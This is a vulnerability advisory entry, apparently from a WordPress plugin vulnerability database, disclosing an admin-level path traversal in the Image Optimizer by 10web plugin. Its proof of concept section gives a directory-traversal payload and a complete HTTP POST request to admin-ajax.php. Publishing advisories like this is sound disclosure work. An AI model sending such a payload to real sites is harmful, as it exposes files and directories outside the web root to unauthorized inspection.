WordPress Plugin Vulnerabilities
Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal
Description
The plugin does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.
Proof of Concept
- Payload: ../../../../../../../../../../../../../../../../../../../ - At the "Other directory" function, select a directory -> At param "dir" add payload: ../../../../../../../../../../ ../ ../../../../../../../../../../.. POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 102 Cookie: [Admiin+] action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../
Affects Plugins
References
CVE
Classification
Type
TRAVERSAL
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chien Vuong
Submitter
Chien Vuong
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-05-02 (about 7 months ago)
Added
2023-05-02 (about 7 months ago)
Last Updated
2023-05-02 (about 7 months ago)